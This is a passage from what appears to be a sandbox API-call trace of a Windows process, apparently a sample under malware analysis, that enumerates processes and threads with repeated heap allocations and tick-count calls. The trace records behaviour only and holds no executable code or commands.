(in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.563] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4fc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OqRoSnESYXcDITEx.exe??????????????????????????????????")) returned 0 [0129.564] GetTickCount () returned 0x116f51d [0129.564] Thread32First (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.565] GetCurrentThreadId () returned 0x618 [0129.565] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.565] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.565] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.566] GetTickCount () returned 0x116f51d [0129.566] GetCurrentThreadId () returned 0x618 [0129.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.566] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.566] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.567] GetTickCount () returned 0x116f51d [0129.567] GetCurrentThreadId () returned 0x618 [0129.567] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.567] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.567] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.568] GetTickCount () returned 0x116f51d [0129.568] GetCurrentThreadId () returned 0x618 [0129.568] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.568] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.568] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.569] GetTickCount () returned 0x116f51d [0129.569] GetCurrentThreadId () returned 0x618 [0129.569] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.569] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.569] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.570] GetTickCount () returned 0x116f51d [0129.570] GetCurrentThreadId () returned 0x618 [0129.570] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.570] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.570] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.571] GetTickCount () returned 0x116f51d [0129.571] GetCurrentThreadId () returned 0x618 [0129.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.571] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.571] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.572] GetTickCount () returned 0x116f51d [0129.572] GetCurrentThreadId () returned 0x618 [0129.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.572] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.573] GetTickCount () returned 0x116f51d [0129.573] GetCurrentThreadId () returned 0x618 [0129.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.573] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.574] GetTickCount () returned 0x116f51d [0129.574] GetCurrentThreadId () returned 0x618 [0129.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.574] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.575] GetTickCount () returned 0x116f51d [0129.575] GetCurrentThreadId () returned 0x618 [0129.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.575] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.576] GetTickCount () returned 0x116f51d [0129.576] GetCurrentThreadId () returned 0x618 [0129.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.576] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.577] GetTickCount () returned 0x116f51d [0129.577] GetCurrentThreadId () returned 0x618 [0129.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.577] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.577] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.578] GetTickCount () returned 0x116f51d [0129.578] GetCurrentThreadId () returned 0x618 [0129.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.578] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.579] GetTickCount () returned 0x116f52d [0129.579] GetCurrentThreadId () returned 0x618 [0129.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.579] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.580] GetTickCount () returned 0x116f52d [0129.580] GetCurrentThreadId () returned 0x618 [0129.580] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.580] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.581] GetTickCount () returned 0x116f52d [0129.581] GetCurrentThreadId () returned 0x618 [0129.581] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.581] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.581] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.582] GetTickCount () returned 0x116f52d [0129.582] GetCurrentThreadId () returned 0x618 [0129.582] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.582] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.582] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.583] GetTickCount () returned 0x116f52d [0129.583] GetCurrentThreadId () returned 0x618 [0129.583] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.583] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.583] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.584] GetTickCount () returned 0x116f52d [0129.584] GetCurrentThreadId () returned 0x618 [0129.584] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.584] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.584] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.585] GetTickCount () returned 0x116f52d [0129.585] GetCurrentThreadId () returned 0x618 [0129.585] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.585] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.585] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.586] GetTickCount () returned 0x116f52d [0129.586] GetCurrentThreadId () returned 0x618 [0129.586] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.586] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.586] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.587] GetTickCount () returned 0x116f52d [0129.587] GetCurrentThreadId () returned 0x618 [0129.587] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.587] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.587] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.588] GetTickCount () returned 0x116f52d [0129.588] GetCurrentThreadId () returned 0x618 [0129.588] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.589] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.589] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.589] GetTickCount () returned 0x116f52d [0129.589] GetCurrentThreadId () returned 0x618 [0129.590] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.590] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.590] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.590] GetTickCount () returned 0x116f52d [0129.590] GetCurrentThreadId () returned 0x618 [0129.591] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.591] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.591] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.592] GetTickCount () returned 0x116f52d [0129.592] GetCurrentThreadId () returned 0x618 [0129.592] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.592] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.592] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.593] GetTickCount () returned 0x116f52d [0129.593] GetCurrentThreadId () returned 0x618 [0129.593] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.593] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.593] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.594] GetTickCount () returned 0x116f52d [0129.594] GetCurrentThreadId () returned 0x618 [0129.594] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.594] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.594] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.595] GetTickCount () returned 0x116f53c [0129.595] GetCurrentThreadId () returned 0x618 [0129.595] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.595] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.595] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.596] GetTickCount () returned 0x116f53c [0129.596] GetCurrentThreadId () returned 0x618 [0129.596] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.596] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.596] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.597] GetTickCount () returned 0x116f53c [0129.597] GetCurrentThreadId () returned 0x618 [0129.597] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.597] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.597] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.598] GetTickCount () returned 0x116f53c [0129.598] GetCurrentThreadId () returned 0x618 [0129.598] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.598] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.598] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.599] GetTickCount () returned 0x116f53c [0129.599] GetCurrentThreadId () returned 0x618 [0129.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.599] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.599] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.602] GetTickCount () returned 0x116f53c [0129.602] GetCurrentThreadId () returned 0x618 [0129.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.602] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.603] GetTickCount () returned 0x116f53c [0129.603] GetCurrentThreadId () returned 0x618 [0129.603] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.603] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.604] GetTickCount () returned 0x116f53c [0129.604] GetCurrentThreadId () returned 0x618 [0129.604] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.604] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.605] GetTickCount () returned 0x116f53c [0129.605] GetCurrentThreadId () returned 0x618 [0129.605] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.605] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.605] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.606] GetTickCount () returned 0x116f53c [0129.606] GetCurrentThreadId () returned 0x618 [0129.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.606] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.606] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.607] GetTickCount () returned 0x116f53c [0129.607] GetCurrentThreadId () returned 0x618 [0129.607] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.607] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.607] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.608] GetTickCount () returned 0x116f53c [0129.608] GetCurrentThreadId () returned 0x618 [0129.608] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.608] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.608] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.610] GetTickCount () returned 0x116f53c [0129.610] GetCurrentThreadId () returned 0x618 [0129.610] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.610] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.610] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.635] GetTickCount () returned 0x116f55b [0129.635] GetCurrentThreadId () returned 0x618 [0129.635] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.635] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.635] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.636] GetTickCount () returned 0x116f55b [0129.636] GetCurrentThreadId () returned 0x618 [0129.636] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.636] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.636] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.637] GetTickCount () returned 0x116f55b [0129.637] GetCurrentThreadId () returned 0x618 [0129.637] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.637] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.637] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.638] GetTickCount () returned 0x116f55b [0129.638] GetCurrentThreadId () returned 0x618 [0129.638] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.638] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.638] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.639] GetTickCount () returned 0x116f55b [0129.639] GetCurrentThreadId () returned 0x618 [0129.639] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.639] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.639] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.640] GetTickCount () returned 0x116f55b [0129.640] GetCurrentThreadId () returned 0x618 [0129.640] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.640] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.640] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.641] GetTickCount () returned 0x116f55b [0129.641] GetCurrentThreadId () returned 0x618 [0129.641] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.641] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.641] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.642] GetTickCount () returned 0x116f56b [0129.642] GetCurrentThreadId () returned 0x618 [0129.642] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.642] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.642] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.643] GetTickCount () returned 0x116f56b [0129.643] GetCurrentThreadId () returned 0x618 [0129.643] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.643] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.643] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.644] GetTickCount () returned 0x116f56b [0129.644] GetCurrentThreadId () returned 0x618 [0129.644] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.644] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.644] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.645] GetTickCount () returned 0x116f56b [0129.645] GetCurrentThreadId () returned 0x618 [0129.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.645] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.645] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.646] GetTickCount () returned 0x116f56b [0129.646] GetCurrentThreadId () returned 0x618 [0129.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.646] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.646] GetTickCount () returned 0x116f56b [0129.646] GetCurrentThreadId () returned 0x618 [0129.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.646] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.647] GetTickCount () returned 0x116f56b [0129.647] GetCurrentThreadId () returned 0x618 [0129.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.647] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.648] GetTickCount () returned 0x116f56b [0129.648] GetCurrentThreadId () returned 0x618 [0129.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.648] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.649] GetTickCount () returned 0x116f56b [0129.649] GetCurrentThreadId () returned 0x618 [0129.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.649] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.650] GetTickCount () returned 0x116f56b [0129.650] GetCurrentThreadId () returned 0x618 [0129.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.650] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.651] GetTickCount () returned 0x116f56b [0129.651] GetCurrentThreadId () returned 0x618 [0129.651] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.651] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.652] GetTickCount () returned 0x116f56b [0129.652] GetCurrentThreadId () returned 0x618 [0129.652] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.652] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.652] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.653] GetTickCount () returned 0x116f56b [0129.653] GetCurrentThreadId () returned 0x618 [0129.653] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.653] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.654] GetTickCount () returned 0x116f56b [0129.654] GetCurrentThreadId () returned 0x618 [0129.654] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.654] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.654] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.655] GetTickCount () returned 0x116f56b [0129.655] GetCurrentThreadId () returned 0x618 [0129.655] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.655] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.655] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.655] GetTickCount () returned 0x116f56b [0129.655] GetCurrentThreadId () returned 0x618 [0129.655] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.656] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.656] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.656] GetTickCount () returned 0x116f56b [0129.656] GetCurrentThreadId () returned 0x618 [0129.656] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.656] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.656] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.657] GetTickCount () returned 0x116f57b [0129.657] GetCurrentThreadId () returned 0x618 [0129.657] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.657] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.657] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.658] GetTickCount () returned 0x116f57b [0129.658] GetCurrentThreadId () returned 0x618 [0129.658] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.658] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.658] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.659] GetTickCount () returned 0x116f57b [0129.659] GetCurrentThreadId () returned 0x618 [0129.659] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.659] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.659] Thread32Next (hSnapshot=0x6f0, lpte=0xe00f434) returned 1 [0129.660] GetTickCount () returned 0x116f57b [0129.660] GetCurrentThreadId () returned 0x618 [0129.660] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.660] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 